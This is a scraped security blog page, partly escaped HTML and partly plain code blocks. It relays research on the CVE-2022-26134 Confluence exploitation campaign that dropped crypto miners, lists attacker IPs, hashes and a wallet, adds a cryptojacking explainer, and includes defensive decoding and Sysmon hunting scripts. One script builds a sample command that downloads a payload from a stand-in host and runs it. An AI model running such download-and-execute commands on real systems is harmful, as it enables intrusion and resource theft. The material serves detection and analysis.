vulnerability\"\u003e\u003c/figure\u003e\n\n\n\n\u003ch4\u003eIoCs\u003c/h4\u003e\n\n\n\n\u003cfigure class=\"wp-block-image\"\u003e\u003cimg decoding=\"async\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/62f11eea9576fd4b2e26c440_iocs 1 log4j.jpg\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\"\u003e\u003c/figure\u003e\n\n\n\n\u003cfigure class=\"wp-block-image\"\u003e\u003cimg decoding=\"async\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/62f11ef37345022b8dfb2403_iocs 2 log4j.jpg\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\"\u003e\u003c/figure\u003e\n\n\n\n\u003cfigure class=\"wp-block-image\"\u003e\u003cimg decoding=\"async\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/62f11efdb7ece0f3fab42a28_iocs 3 log4j.jpg\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\"\u003e\u003c/figure\u003e\n\n\n\n\u003chr class=\"wp-block-separator has-alpha-channel-opacity\"\u003e\n\n\n\n\u003cp\u003eOn May 31, 2022, a critical unpatched vulnerability affecting all supported versions of Confluence Server and Data Center was\u0026nbsp;\u003ca href=\"https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/\"\u003ereported\u003c/a\u003e\u0026nbsp;to Atlassian by Volexity, a security company.\u003c/p\u003e\n\n\n\n\u003cp\u003eAtlassian\u0026nbsp;\u003ca href=\"https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html\"\u003ewarned\u003c/a\u003e\u0026nbsp;its customers of the critical vulnerability on June 2 and issued a patch a day later. 
CISA added this vulnerability to its Known Exploited Vulnerabilities catalog on June 3.\u003c/p\u003e\n\n\n\n\u003cp\u003eCheck Point released a dedicated protection to prevent attacks exploiting this vulnerability and advises customers to patch the affected systems.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eThe Vulnerability\u003c/strong\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003eThe vulnerability in Atlassian Confluence Server and Data Center, designated \u003ca href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134\" target=\"_blank\" rel=\"noreferrer noopener\"\u003eCVE-2022-26134\u003c/a\u003e, is an unauthenticated Object-Graph Navigation Language (OGNL) expression injection.\u003c/p\u003e\n\n\n\n\u003cp\u003eA remote, unauthenticated attacker can use it to execute arbitrary code on the target server by placing a malicious OGNL expression in the request URI.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cimg decoding=\"async\" loading=\"lazy\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/y1.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" width=\"639\" height=\"114\"\u003e\u003c/p\u003e\n\n\n\n\u003cp id=\"caption-attachment-28249\"\u003eFigure 1: Malicious payload that exploits \u003ca href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134\" target=\"_blank\" rel=\"noreferrer noopener\"\u003eCVE-2022-26134\u003c/a\u003e.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eIn The Wild Exploitation\u003c/strong\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003eCheck Point Research (CPR) observed a large number of exploitation attempts after the vulnerability was published. At first, many of the would-be attackers used scanning methods to identify vulnerable targets. 
After a few days, the attackers started to use the vulnerability to download malware to the affected systems.\u003c/p\u003e\n\n\n\n\u003cp\u003eAmong the exploitation logs, researchers noticed a few malicious payloads that are related to the same campaign and that originated from the same source but targeted different platforms: Linux and Windows.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe infection chain depends on the victim’s operating system.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eThe Linux OS Targeted Attack\u003c/strong\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003eThe attacker utilized the Atlassian 0-day vulnerability by sending a crafted HTTP request to the victim.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cimg decoding=\"async\" loading=\"lazy\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/y2.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" width=\"654\" height=\"115\"\u003e\u003c/p\u003e\n\n\n\n\u003cp id=\"caption-attachment-28250\"\u003eFigure 2: A crafted HTTP request exploiting CVE-2022-26134 with a base64 encoded payload.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe base64 string decodes into another base64 encoded string. 
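\u003c/p\u003e

Unwrapping a payload like that by hand is error-prone once it is percent-encoded in the URI and base64-wrapped more than once. The helper below is an added example, not code from this page or from Check Point: it percent-decodes a request path until stable and flags OGNL syntax in it, then peels base64 layers off a captured payload until a readable command is reached. The path, the 203.0.113.10 host and the two-layer payload are constructed for the example; the inner command mirrors the xms download, execute and delete sequence described below rather than the captured one.

```python
"""Triage a suspected CVE-2022-26134 request: decode the URI, flag OGNL syntax,
and unwrap layered base64 to reach the command it carries.

Added example; not code from this page or from Check Point. The request path,
the 203.0.113.10 host and the base64 layers are constructed for the example.
"""
import base64
import re
from urllib.parse import unquote

# OGNL expression syntax as it appears in an injected URI segment:
# ${...} and %{...} delimiters, @class@method static calls, #variable references.
_OGNL = re.compile(r"\$\{|%\{|@[\w.]+@|#[A-Za-z_]\w*")
# Candidate base64 tokens: long enough to carry a command, base64 alphabet only.
_B64 = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_uri(uri: str) -> str:
    """Percent-decode until stable so double-encoded payloads are seen in the clear."""
    decoded = unquote(uri)
    while decoded != uri:
        uri, decoded = decoded, unquote(decoded)
    return uri


def ognl_markers(uri: str) -> list:
    """Distinct OGNL markers present in the decoded request path (empty if none)."""
    return sorted(set(_OGNL.findall(decode_uri(uri))))


def _as_text(token: str):
    """Decode one base64 token; None unless the result is readable ASCII text."""
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if all(c.isprintable() or c in "\r\n\t" for c in text) else None


def peel_base64(payload: str, max_depth: int = 8) -> list:
    """[payload, layer1, ..., innermost]: at each layer decode the longest base64
    token that yields readable text, stopping when nothing more decodes."""
    layers = [payload]
    for _ in range(max_depth):
        tokens = sorted(_B64.findall(layers[-1]), key=len, reverse=True)
        inner = next((t for t in map(_as_text, tokens) if t is not None), None)
        if inner is None:
            break
        layers.append(inner)
    return layers


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


# Constructed to mirror the Linux chain (fetch xms to /tmp, run it, delete it),
# wrapped twice in base64 the way the captured payload was.
INNER_CMD = "curl -fsSL http://203.0.113.10/xms -o /tmp/xms; sh /tmp/xms; rm -f /tmp/xms"
LAYER1 = f"echo {_b64(INNER_CMD)} | base64 -d | bash"
SAMPLE_PAYLOAD = f'bash -c "echo {_b64(LAYER1)} | base64 -d | bash"'
# A harmless OGNL expression, percent-encoded in the path as the exploit requests are.
SAMPLE_PATH = "/%24%7B%28%23x%3D%27x%27%29%7D/"

if __name__ == "__main__":
    print(decode_uri(SAMPLE_PATH), ognl_markers(SAMPLE_PATH))
    for depth, layer in enumerate(peel_base64(SAMPLE_PAYLOAD)):
        print(f"layer {depth}: {layer}")
```

The marker list is a triage signal, not proof: `#` and `${` can occur in legitimate URLs, so pair it with the Confluence access log's response code and the request source. The innermost layer is what goes into the IoC list (hosts, paths, file names), not the outer base64 blobs, which change with every re-encoding.

\u003cp\u003e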
Overall, researchers had to decode the string a few times to get the actual payload.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cimg decoding=\"async\" loading=\"lazy\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/y3.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" width=\"319\" height=\"360\"\u003e\u003c/p\u003e\n\n\n\n\u003cp id=\"caption-attachment-28251\"\u003eFigure 3: The decoded base64 string.\u003c/p\u003e\n\n\n\n\u003cp\u003eThis script downloads a bash script file called\u0026nbsp;\u003cem\u003exms\u003c/em\u003e\u0026nbsp;from the remote C\u0026amp;C server to the victim’s tmp folder, executes it, and deletes it afterward.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cimg decoding=\"async\" loading=\"lazy\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/y4.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" width=\"602\" height=\"277\"\u003e\u003c/p\u003e\n\n\n\n\u003cp id=\"caption-attachment-28252\"\u003eFigure 4: Part of the malicious xms script.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe\u0026nbsp;\u003cem\u003exms\u003c/em\u003e\u0026nbsp;file is a dropper script. It uninstalls running agents from the victim’s machine and adds itself to cron jobs to maintain persistence upon reboot.\u003c/p\u003e\n\n\n\n\u003cp\u003eIn addition, a network connectivity test to a[.]oracleservice.top is performed constantly.\u003c/p\u003e\n\n\n\n\u003cp\u003eIn an attempt to spread to other machines, the script searches for ssh keys and tries to connect. 
It then downloads the xms file from the C\u0026amp;C server and executes it.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe script downloads an ELF executable called\u0026nbsp;\u003cem\u003edbused\u0026nbsp;\u003c/em\u003eto the\u003cem\u003e\u0026nbsp;tmp\u0026nbsp;\u003c/em\u003efolder from various remote IPs.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe\u0026nbsp;\u003cem\u003edbused\u003c/em\u003e\u0026nbsp;file is packed with UPX to evade static detection.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe ELF file is a crypto miner that exhausts the victim machine’s resources:\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cimg decoding=\"async\" loading=\"lazy\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/y5.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" width=\"532\" height=\"113\"\u003e\u003c/p\u003e\n\n\n\n\u003cp id=\"caption-attachment-28253\"\u003eFigure 5: The dbused process exhausts the system resources.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eThe Windows OS Targeted Attack\u003c/strong\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003eThe attacker used the Atlassian vulnerability to execute a PowerShell download cradle, initiating a fileless attack from a remote C\u0026amp;C server.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cimg decoding=\"async\" loading=\"lazy\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/y6.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" width=\"616\" height=\"96\"\u003e\u003c/p\u003e\n\n\n\n\u003cp id=\"caption-attachment-28254\"\u003eFigure 6: A crafted HTTP request exploiting CVE-2022-26134 using PowerShell commands.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe\u0026nbsp;\u003cem\u003elol.ps1\u003c/em\u003e\u0026nbsp;script is loaded straight into the memory of a PowerShell process, without being written to disk.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe script verifies 
the processor’s architecture, using\u0026nbsp;\u003cem\u003eWMI\u003c/em\u003e\u0026nbsp;to check whether it matches its requirements.\u003cbr\u003eIt then downloads an executable file called\u0026nbsp;\u003cem\u003echeckit2\u003c/em\u003e\u0026nbsp;to the\u003cem\u003e\u0026nbsp;tmp\u003c/em\u003e\u0026nbsp;folder and runs it in hidden mode.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cimg decoding=\"async\" loading=\"lazy\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/y7.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" width=\"585\" height=\"125\"\u003e\u003c/p\u003e\n\n\n\n\u003cp id=\"caption-attachment-28255\"\u003eFigure 7: The lol.ps1 script.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe\u003cem\u003e\u0026nbsp;checkit2.exe\u003c/em\u003e\u0026nbsp;process spawns a child process called\u0026nbsp;\u003cem\u003eInstallUtil.exe\u003c/em\u003e, which connects to the C\u0026amp;C server. The\u0026nbsp;\u003cem\u003eInstallUtil.exe\u003c/em\u003e\u0026nbsp;process in turn spawns another child process,\u0026nbsp;\u003cem\u003eAddInProcess.exe\u003c/em\u003e, which is the crypto miner. Both are legitimate .NET Framework binaries, so the signal to hunt on is this parent-child chain under an unknown executable in tmp rather than the image names themselves. 
After a few moments of running on the victim’s machine, the\u0026nbsp;\u003cem\u003echeckit2\u003c/em\u003e\u0026nbsp;process terminates itself.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cimg decoding=\"async\" loading=\"lazy\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/y8.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" width=\"663\" height=\"17\"\u003e\u003c/p\u003e\n\n\n\n\u003cp id=\"caption-attachment-28256\"\u003eFigure 8: The checkit2.exe process running on the system.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cimg decoding=\"async\" loading=\"lazy\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/y9.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" width=\"657\" height=\"34\"\u003e\u003c/p\u003e\n\n\n\n\u003cp id=\"caption-attachment-28257\"\u003eFigure 9: The InstallUtil.exe process running on the system.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe malware downloads a new copy of itself, with a new name, to the Start Menu folder.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cimg decoding=\"async\" loading=\"lazy\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/y10.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" width=\"537\" height=\"97\"\u003e\u003c/p\u003e\n\n\n\n\u003cp id=\"caption-attachment-28258\"\u003eFigure 10: The cloud.exe file downloaded to the Startup folder.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe crypto miner now runs on the machine and exhausts all the system’s resources:\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cimg decoding=\"async\" loading=\"lazy\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/y.png\" alt=\"Exploit in the 
cryptocurrency mining code that used a dangerous Log4j vulnerability\" width=\"725\" height=\"17\"\u003e\u003c/p\u003e\n\n\n\n\u003cp id=\"caption-attachment-28261\"\u003eFigure 11: Crypto wallet information.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eAttack chain\u003c/strong\u003e\u003c/p\u003e\n\n\n\n\u003cfigure class=\"wp-block-image\"\u003e\u003cimg decoding=\"async\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/y11.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" class=\"wp-image-28259\"\u003e\u003c/figure\u003e\n\n\n\n\u003cp\u003eBoth attack scenarios start with an initial crafted HTTP request exploiting the CVE-2022-26134 vulnerability. The request carries an OGNL expression in the URI that calls Java’s Runtime.exec to run commands which download a malicious payload to the victim’s machine.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe malicious payload then downloads an executable file according to the affected OS. 
Both executables run a crypto miner to utilize the victim’s resources for their own benefit.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eThreat Actors\u003c/strong\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003eThe a[.]oracleservice.top domain and the crypto wallet we extracted from the system are related to a cybercriminal group called the “\u003ca href=\"https://www.lacework.com/blog/8220-gangs-recent-use-of-custom-miner-and-botnet/\"\u003e8220 gang\u003c/a\u003e”.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eCheck Point Protections:\u003c/strong\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003eIPS:\u003cbr\u003eAtlassian Confluence Remote Code Execution (CVE-2022-26134)\u003c/p\u003e\n\n\n\n\u003cp\u003eAnti-Bot:\u003cbr\u003eTrojan.WIN32.XMRig\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eIOCs:\u003c/strong\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003e198.251.86[.]46\u003c/p\u003e\n\n\n\n\u003cp\u003e51.79.175[.]139\u003c/p\u003e\n\n\n\n\u003cp\u003e167.114.114[.]169\u003c/p\u003e\n\n\n\n\u003cp\u003e146.59.198[.]38\u003c/p\u003e\n\n\n\n\u003cp\u003e51.255.171[.]23\u003c/p\u003e\n\n\n\n\u003cp\u003ea.oracleservice[.]top\u003c/p\u003e\n\n\n\n\u003cp\u003ed2bae17920768883ff8ac9a8516f9708967f6c6afe2aa6da0241abf8da32456e\u003c/p\u003e\n\n\n\n\u003cp\u003e2622f6651e6eb01fc282565ccbd72caba9844d941b9d1c6e6046f68fc873d5e0\u003c/p\u003e\n\n\n\n\u003cp\u003e4e48080f37debd76af54a3231ecaf3aa254a008fae1253cdccfcc36640f955d9\u003c/p\u003e\n\n\n\n\u003cp\u003e4b8be1d23644f8cd5ea22fa4f70ee7213d56e3d73cbe1d0cc3c8e5dfafe753e0\u003c/p\u003e\n\n\n\n\u003cp\u003eMonero Wallet:\u003cbr\u003e46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003ca href=\"https://blog.checkpoint.com/2022/12/20/is-cloud-native-security-good-enough/\"\u003e\u003c/a\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003c/p\u003e\n\n\n\n\u003chr class=\"wp-block-separator 
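\u003cp\u003eThe process tree described above (checkit2.exe launched from the temp folder, spawning InstallUtil.exe, which connects to the C\u0026amp;C server and spawns AddInProcess.exe, plus the copy dropped into the Startup folder) is what a hunter turns into detection logic. The Python below is an added example, not code from the report or from this repository: it walks constructed Sysmon-style events (process create, file create, network connect; the event shapes, process IDs and user paths are assumptions) and flags the chain, the persistence drop, and any connection to the indicators listed above. Because InstallUtil.exe and AddInProcess.exe are legitimate .NET Framework binaries, the rules key on the parent chain rather than on the file names.\u003c/p\u003e

```python
"""Hunt for the checkit2 -> InstallUtil -> AddInProcess chain in Sysmon-style telemetry."""
import ntpath

# Network indicators quoted in the IOC list above. The process and file rules
# below are heuristics derived from the described chain, not from the report.
IOC_HOSTS = {
    "a.oracleservice.top",
    "198.251.86.46", "51.79.175.139", "167.114.114.169",
    "146.59.198.38", "51.255.171.23",
}
# Legitimate .NET Framework utilities that the chain abuses as payload hosts.
DOTNET_HOSTS = {"installutil.exe", "addinprocess.exe"}
STARTUP_MARK = "\\start menu\\programs\\startup\\"

# Constructed events (not real telemetry) modelled on Sysmon event IDs
# 1 = process create, 11 = file create, 3 = network connect.
EVENTS = [
    {"id": 1, "pid": 400, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"id": 11, "pid": 400, "target": r"C:\Users\alice\AppData\Local\Temp\checkit2.exe"},
    {"id": 1, "pid": 500, "ppid": 400, "image": r"C:\Users\alice\AppData\Local\Temp\checkit2.exe"},
    {"id": 1, "pid": 600, "ppid": 500, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"},
    {"id": 3, "pid": 600, "dest": "a.oracleservice.top"},
    {"id": 1, "pid": 700, "ppid": 600, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe"},
    {"id": 11, "pid": 600, "target": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cloud.exe"},
    # Benign noise: an installer legitimately running InstallUtil.exe from msiexec.
    {"id": 1, "pid": 800, "ppid": 100, "image": r"C:\Windows\System32\msiexec.exe"},
    {"id": 1, "pid": 801, "ppid": 800, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"},
    {"id": 3, "pid": 801, "dest": "download.microsoft.com"},
]


def build_tree(events):
    """Map pid -> its process-create event."""
    return {e["pid"]: e for e in events if e["id"] == 1}


def ancestry(procs, pid):
    """Process-create events from pid upward to the root we have telemetry for."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid])
        pid = procs[pid]["ppid"]
    return chain


def image_name(e):
    return ntpath.basename(e["image"]).lower()


def from_temp(path):
    p = path.lower()
    return "\\temp\\" in p or "\\tmp\\" in p


def hunt(events):
    """Return (rule, pid, detail) findings in event order."""
    procs = build_tree(events)
    findings = []
    for e in events:
        if e["id"] == 1:
            chain = ancestry(procs, e["pid"])
            names = [image_name(p) for p in chain]
            tree = " > ".join(reversed(names))
            # R1: a .NET host utility descending from a binary launched out of a temp dir.
            if names[0] in DOTNET_HOSTS and any(from_temp(p["image"]) for p in chain[1:]):
                findings.append(("dotnet-host-from-temp", e["pid"], tree))
            # R2: the exact parent/child pair the report describes for the miner.
            if names[0] == "addinprocess.exe" and len(names) > 1 and names[1] == "installutil.exe":
                findings.append(("installutil-spawns-addinprocess", e["pid"], tree))
        elif e["id"] == 11:
            t = e["target"]
            # R3: an executable dropped into a per-user Startup folder for persistence.
            if STARTUP_MARK in t.lower() and t.lower().endswith(".exe"):
                findings.append(("startup-folder-drop", e["pid"], t))
        elif e["id"] == 3:
            # R4: a direct hit on a published indicator.
            if e["dest"].lower() in IOC_HOSTS:
                findings.append(("ioc-network", e["pid"], e["dest"]))
    return findings


if __name__ == "__main__":
    for finding in hunt(EVENTS):
        print(*finding, sep="\t")
```

\u003cp\u003eRun as a script it prints five findings for the malicious chain and none for the msiexec-launched InstallUtil.exe, which is the false positive a file-name-only rule would produce. To use the same rules on real Sysmon or EDR exports, map their fields onto the three event shapes; the IOC set should be refreshed from the vendor feed rather than hard-coded as it is here.\u003c/p\u003e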
has-alpha-channel-opacity\"\u003e\n\n\n\n\u003ch1\u003eCryptojacking explained: How to prevent, detect, and recover from it\u003c/h1\u003e\n\n\n\n\u003ch3\u003eCriminals are using ransomware-like tactics and poisoned websites to get your employees’ computers to mine cryptocurrencies. Here’s what you can do to stop it.\u003c/h3\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eCryptojacking definition\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eCryptojacking is the unauthorized use of someone else’s compute resources to mine cryptocurrency. Hackers seek to hijack any kind of systems they can take over—desktops, servers, cloud infrastructure and more—to illicitly mine for crypto coins.\u003c/p\u003e\n\n\n\n\u003cp\u003eRegardless of the delivery mechanism, cryptojacking code typically works quietly in the background as unsuspecting victims use their systems normally. The only signs they might notice are slower performance, lags in execution, overheating, excessive power consumption, or abnormally high cloud computing bills.\u003c/p\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eHow cryptojacking works\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eCoin mining is a legitimate process in the cryptocurrency world that releases new cryptocurrency into circulation. The process works by rewarding currency to the first miner who solves a complex computational problem. That problem completes blocks of verified transactions that are added to the cryptocurrency blockchain.\u003c/p\u003e\n\n\n\n\u003cp\u003e“Miners are essentially getting paid for their work as auditors. They are doing the work of verifying the legitimacy of Bitcoin transactions,” detailed\u0026nbsp;\u003ca href=\"https://www.investopedia.com/tech/how-does-bitcoin-mining-work/\" rel=\"noreferrer noopener\" target=\"_blank\"\u003ea recent Investopedia explainer\u003c/a\u003e\u0026nbsp;on how Bitcoin mining works. 
“In addition to lining the pockets of miners and supporting the Bitcoin ecosystem, mining serves another vital purpose: It is the only way to release new cryptocurrency into circulation.”\u003c/p\u003e\n\n\n\n\u003cp\u003eEarning cryptocurrency via coin mining typically takes a huge amount of processing power and energy to carry off. Additionally, the cryptocurrency ecosystem is designed in a way that makes mining harder and reduces the rewards for it over time and with more mining competition. This makes legitimate cryptocurrency coin mining an extremely costly affair, with expenses rising all the time.\u003c/p\u003e\n\n\n\n\u003cp\u003eCybercriminals slash mining overhead by simply stealing compute and energy resources. They use a range of hacking techniques to gain access to systems that will do the computational work illicitly and then have these hijacked systems send the results to a server controlled by the hacker.\u003c/p\u003e\n\n\n\n\u003ch2\u003eCryptojacking attack methods\u003c/h2\u003e\n\n\n\n\u003cp\u003eThe attack methods are limited only by the cryptojackers’ creativity, but the following are some of the most common ones used today.\u003c/p\u003e\n\n\n\n\u003ch3\u003e\u003cstrong\u003eEndpoint attacks\u003c/strong\u003e\u003c/h3\u003e\n\n\n\n\u003cp\u003eIn the past, cryptojacking was primarily an endpoint malware play, existing as yet another moneymaking objective for dropping malware on desktops and laptops. Traditional cryptojacking malware is delivered via typical routes like fileless malware, phishing schemes, and embedded malicious scripts on websites and in web apps.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe most basic way cryptojacking attackers can steal resources is by sending endpoint users a legitimate-looking email that encourages them to click on a link that runs code to place a cryptomining script on their computer. 
It runs in the background and sends results back via a command and control (C2) infrastructure.\u003c/p\u003e\n\n\n\n\u003cp\u003eAnother method is to inject a script on a website or an ad that is delivered to multiple websites. Once victims visit the website or the infected ad pops up in their browsers, the script automatically executes. No code is stored on the victims’ computers.\u003c/p\u003e\n\n\n\n\u003cp\u003eThese avenues still remain a legitimate concern, though criminals have added significantly more sophisticated techniques to their cryptojacking playbooks as they seek to scale up profits, with some of these evolving methods described below.\u003c/p\u003e\n\n\n\n\u003ch3\u003e\u003cstrong\u003eScan for vulnerable servers and network devices\u003c/strong\u003e\u003c/h3\u003e\n\n\n\n\u003cp\u003eAttackers seek to amp up the profitability of cryptojacking by expanding their horizons to servers, network devices, and even IoT devices. Servers, for example, are a particularly juicy target since they are usually more powerful than a run-of-the-mill desktop. They’re also a prime hunting ground in 2022 as the bad guys scan for servers exposed to the public internet that contain vulnerabilities such as Log4J, exploiting the flaw and quietly loading cryptomining software on the system that’s connected to the hacker’s servers. Often attackers will use the initially compromised system to move their cryptojacking laterally into other network devices.\u003c/p\u003e\n\n\n\n\u003cp\u003e“We’re seeing an uptick in cryptomining stemming from the Log4J vulnerability,” says Sally Vincent, senior threat research engineer for LogRhythm. 
“Hackers are breaking into networks and installing malware that uses storage to mine cryptos.”\u003c/p\u003e\n\n\n\n\u003ch3\u003e\u003cstrong\u003eSoftware supply chain attacks\u003c/strong\u003e\u003c/h3\u003e\n\n\n\n\u003cp\u003eCybercriminals are targeting the software supply chain by\u0026nbsp;\u003ca href=\"https://www.csoonline.com/article/3649091/npm-javascript-registry-suffers-massive-influx-of-malware-report-says.html\" rel=\"noreferrer noopener\" target=\"_blank\"\u003eseeding open-source code repositories\u003c/a\u003e\u0026nbsp;with malicious packages and libraries that contain cryptojacking scripts embedded within their code. With developers downloading these packages by the millions around the globe, these attacks can rapidly scale up cryptojacking infrastructure for the bad guys in two ways. The malicious packages can be used to target developer systems—and the networks and cloud resources they connect to—to use them directly as illicit cryptomining resources. Or they can leverage these attacks to poison the software that these developers are building with components that execute cryptomining scripts on the machines of an application’s end user.\u003c/p\u003e\n\n\n\n\u003ch3\u003e\u003cstrong\u003eLeveraging cloud infrastructure\u003c/strong\u003e\u003c/h3\u003e\n\n\n\n\u003cp\u003eMany cryptojacking enterprises are taking advantage of the scalability of cloud resources by breaking into cloud infrastructure and tapping into an even broader collection of compute pools to power their mining activity. 
A\u0026nbsp;\u003ca href=\"https://services.google.com/fh/files/misc/gcat_threathorizons_brief_nov2021.pdf\" rel=\"noreferrer noopener\" target=\"_blank\"\u003estudy last fall by Google’s Cybersecurity Action Team\u003c/a\u003e\u0026nbsp;reported that 86% of compromised cloud instances are used for cryptomining.\u003c/p\u003e\n\n\n\n\u003cp\u003e“Today, attackers are targeting cloud services by any means to mine more and more cryptocurrency, as cloud services can allow them to run their calculations on a larger scale than just a single local machine, whether they’re taking over a user’s managed cloud environment or even abusing SaaS applications to execute their calculations,” Guy Arazi, senior security researcher for Palo Alto Networks, wrote\u0026nbsp;\u003ca href=\"https://www.paloaltonetworks.com/blog/security-operations/stopping-cryptojacking-attacks-with-and-without-an-agent/\" rel=\"noreferrer noopener\" target=\"_blank\"\u003ein a blog post\u003c/a\u003e.\u003c/p\u003e\n\n\n\n\u003cp\u003eOne of the common methods to do this is by scanning for exposed container APIs or unsecured cloud storage buckets and using that access to start loading coin-mining software on impacted container instances or cloud servers. The attack is typically automated with scanning software that looks for servers accessible to the public internet with exposed APIs or unauthenticated access possible. 
